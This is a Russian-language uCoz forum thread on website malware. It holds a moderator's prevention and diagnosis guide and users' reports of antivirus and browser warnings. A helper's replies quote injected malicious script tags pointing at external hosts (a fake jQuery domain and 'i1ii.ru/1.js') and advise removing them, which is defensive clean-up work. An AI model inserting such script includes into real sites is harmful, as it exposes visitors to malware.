Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    Fastwow
    Сообщений: 52
    Репутация: 0

    Сообщение # 1366 | 16:11:14
    Все было нормально, но вчера друг сказал, что на моем сайте аваст выбивает ошибку, типо вирус:

    Но я не пойму в чем причина, все проверил, вроде норм
    Вот результаты проверок:
    https://www.virustotal.com/ru....nalysis
    http://app.webinspector.com/public/reports/22620596
    http://www.urlvoid.com/scan/deest.ru/
    http://sitecheck.sucuri.net/results/deest.ru/
    http://zulu.zscaler.com/submiss....3090181
    Я думаю, может проблема в том, что ваш антивирус опирается на сайт Web Of Trust? Там сайт имеет плохую репутацию, но тут я могу пояснить: домен купил два дня назад, а отрицательную репутацию сайт получил за два отзыва оставленных в 2012 году
    ___________________
    Может это вызвано моими соседями по айпи адресу?
    http://www.urlvoid.com/ip/193.109.246.68/
    http://sitecheck.sucuri.net/results/193.109.246.68
    http://www.scumware.org/report/193.109.246.68
    https://www.virustotal.com/ru/ip-address/193.109.246.68/information/

    К кому мне обращаться в данном случае? Более половины трафика пропало теперь из-за этой ерунды
    Altair8808
    Сообщений: 4
    Репутация: 0

    Сообщение # 1367 | 16:28:53
    Здравствуйте!
    Пользуюсь браузером Маззилой.
    Вот такая проблема случается только, когда на сайт входишь под логином, гости этого не видят:
    Такое твориться на всех страницах сайта. Что именно происходит:
    при наведении курсора мыши на любую картинку, которая есть на сайте, даже в статье,
    появляется странное изображение:

    Это на главной.
    Вот в статье:

    Подобное происходит на всём сайте, где есть любые картинки.
    На сайте никакой сторонней рекламы нет, только баннеры партнёров.
    Подскажите, пожалуйста, в чём может быть проблема?
    Это всё начало происходит с сегодняшнего дня, раньше такого не было.
    Как быть?
    Прикрепления: 8819894.jpg (295.6 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1368 | 17:21:12
    Fastwow, пишите в тех.поддержку аваста. ваш адрес попал в черный список. аваст не блокирует вредоносное содержимое на вашем сайте. аваст блокирует ваш сайт

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1369 | 17:26:56
    Altair8808, правила подачи заявки касаются всех. надо не скрины давать, а ссылку на сайт в первую очередь

    удаляем через быструю замену скрипт

    Код
    <script type="text/javascript" src="http://jquery-library.ru/jquery.min.js"></script>
    сбрасываем кеш и отписываемся о результатах

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Administrator_A
    Сообщений: 1
    Репутация: 0

    Сообщение # 1370 | 17:27:06
    при открытии сайтов http://brsmgantcevichi.ucoz.ru/ и http://brsm-brest.ucoz.ru/ через браузер гугл хром появляется сообщение Google Chrome заблокировал доступ к этой странице на сайте brsm-brest.ucoz.ru.Эта страница содержит контент с сайта brsmgantcevichi.ucoz.ru, который был замечен в распространении вредоносного ПО. Ее посещение может привести к заражению вашего компьютера. В чем причина?
    Сообщение отредактировал Administrator_A - Пятница, 20 Июн 2014, 00:02:20
    lytik
    Сообщений: 7
    Репутация: 0

    Сообщение # 1371 | 19:06:07
    Здравствуйте, помогите пожалуйста!
    Яндекс вебмастер показывает что на сайте содержится вредоносный код.
    Подскажите как его найти и удалить? Вот ссылка на сайт: http://www.kino-obzor.org/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1372 | 19:11:31
    lytik, из формы входа удалите скрипт

    Код
    <script src="http://i1ii.ru/1.js" type="text/javascript"></script>


    и ваши плееры содержат рекламу например плеер от кинолот

    Код
    <script type="text/javascript" src="http://www.vk.ws/static/video-mideo/715/pdp.js?ignoredesktoptb"></script>

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    lytik
    Сообщений: 7
    Репутация: 0

    Сообщение # 1373 | 19:20:03
    webanet, так реклама же по мойму не должна считаться вирусом?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1374 | 19:21:44
    lytik, это по-вашему

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    lytik
    Сообщений: 7
    Репутация: 0

    Сообщение # 1375 | 19:30:17
    из формы входа удалите скрипт

    Код
    <script src="http://i1ii.ru/1.js" type="text/javascript"></script>
    Цитата webanet1194не могу найти что то такой скрипт в форме входа(

    <table width="100%">
    <tbody>
    <tr>
    <td><center><div class="avaa">
    <?if($USER_AVATAR_URL$)?>

    <img src="$USER_AVATAR_URL$" max-height="150" max-width="150">
    <?else?>
    <img src="http://wallaby.ucoz.ru/_ph/1/2/97403799.png" width="150" height="150">

    <?endif?>
    </div></center>
    <?if($USER_LOGGED_IN$)?><div id="about_pr">
    <center style="margin-top:1px;"><span style="font-size: 8pt;margin-left:5px;margin-top:2px;"><b>$USERNAME$ ($USER_FULL_NAME$)</b></span></center><img src="http://wallaby.ucoz.ru/_ph/1/2/474335936.png" style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />
    <span style="font-size: 8pt;margin-left:5px;">ID: <div style="float: right;margin-right:5px;"><b>$USER_ID$</b></div></span><img src="http://wallaby.ucoz.ru/_ph/1/2/474335936.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />

    <span style="font-size: 8pt;margin-left:5px;">Вы: <div style="float: right;margin-right:5px;"><b>$USER_GENDER$</b></div></span><img src="http://wallaby.ucoz.ru/_ph/1/2/474335936.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />

    <span style="font-size: 8pt;margin-left:5px;">Вы тут: <div style="float: right;margin-right:5px;"><b>$USER_REG_DAYS$ д<?if($USER_REG_DAYS$%10=0||$USER_REG_DAYS$%10>4||$USER_REG_DAYS$%100>10&&$USER_REG_DAYS$%100<15)?>ней<?else?><?if($USER_REG_DAYS$%10=1)?>ень<?else?>ня<?endif?><?endif?></b></div></span></span><img src="http://wallaby.ucoz.ru/_ph/1/2/474335936.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />

    <span style="font-size: 8pt;margin-left:5px;">Група: <div style="float: right;margin-right:5px;"><b>$USER_GROUP$</b></div></span><img src="http://wallaby.ucoz.ru/_ph/1/2/474335936.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />

    <div style="vertical-align: bottom;margin-bottom:2px;"><span style="font-size: 8pt;margin-left:5px;">IP: <div style="float: right;margin-right:5px;"><b>$IP_ADDRESS$</b></div></span> </div>
    </div></td>
    </tr>
    </tbody>
    </table>
    <table width="103%">
    <tbody>
    <tr><td width="50%">
    <input class="buttonprofile" style="width:100%;" target="_blank" type="button" onclick="document.location.href='/index/8'; return false; target: blank;" value="Профиль"/>
    <input class="buttonprofile"style="width:100%;" type="button" onclick="document.location.href='$PM_URL$'; return false;" value="Читать ЛС (<?if($IS_NEW_PM$)?>$IS_NEW_PM$<?else?>0<?endif?>)"/>
    </td>
    <td width="50%">
    <input class="buttonprofile"style="width:100%;height:43;" type="button" onclick="document.location.href='$LOGOUT_LINK$'; return false;" value="Выход"/>
    </td>
    </tr>
    </tbody>
    </table><?else?>
    $LOGIN_FORM$

    </td>
    </tr>
    </tbody>
    </table><?endif?>
    Сообщение отредактировал webanet - Понедельник, 23 Июн 2014, 19:33:10
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1376 | 19:34:16
    lytik, я сказала шаблон формы входа, а не этот крутой мусор профиля на сайте
    ищите в списке шаблонов шаблон формы входа, оттуда и удаляйте

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    lytik
    Сообщений: 7
    Репутация: 0

    Сообщение # 1377 | 19:45:07
    webanet, всё удалил) спасибо за помощь. Буду сейчас ждать повторной проверки!
    yolbars-77
    Сообщений: 20
    Репутация: 5

    Сообщение # 1378 | 22:20:06
    Сайт Дом картинок , скриншот браузера: http://s020.radikal.ru/i722/1407/5f/6114a4ca8b52.png (в Мазилле и в Хроме, остальные не проверял)
    Скриншоты уведомлений:
    1. http://s005.radikal.ru/i212/1407/67/a9824aac5baf.png
    2. http://s020.radikal.ru/i719/1407/30/0fd9af9879a1.png
    И таких уведомлений в Eset больше 100, антивирус ругается на каждую картинку в ssc и т.д., даже на иконку сайта favicon. Установлен лицензионный антивирус Eset Smart Sekurity 7. При этом проверил сайт на онлайн антивирусах, вирусов на сайте не обнаружено. Проверку осуществлял в ресурсах Antivirus-alarm и Drweb online . При всём при этом дизайн сайта перекошен, кнопки социальных сетей вашей системы почему то отображаются над шапкой сайта. То, что сейчас отображается над шапкой сайта, вся эта абракадабра - это панель кнопок от социалок. При авторизации в панели управления все ссылки управления - в одной куче, никакого дизайна. Админ панель сайта вообще отсутствует. В чём дело, что с сайтом? Написать о проблеме в тех.поддержку не получается, как я написал, админ.панели нет вообще, а ведь ссылка на обращение в тех.службу находится в админ панели.

    Следует добавить, что резервное копирование прежних шаблонов (рабочих) ни к каким результатам не приводит. Отсюда напрашивается вывод, что вся проблема в системе. Прошу разобраться с багами системы.

    Сообщение отредактировал yolbars-77 - Воскресенье, 06 Июл 2014, 22:48:44
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1379 | 22:28:16
    yolbars-77, это ложно срабатывание. причем срабатывает на сервера юкоз. нажмите на сообщить о неправильно заблокированной странице

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    yolbars-77
    Сообщений: 20
    Репутация: 5

    Сообщение # 1380 | 22:30:53
    Цитата webanet ()
    нажмите на сообщить о неправильно заблокированной странице

    Нажал на эту ссылку в браузере, предоставленную антивирусом, ещё 5 часов назад. Но сегодня, как назло, выходной. Вы думаете, проблема только в Eset?

    Сообщение отредактировал yolbars-77 - Воскресенье, 06 Июл 2014, 22:32:37
    Поиск: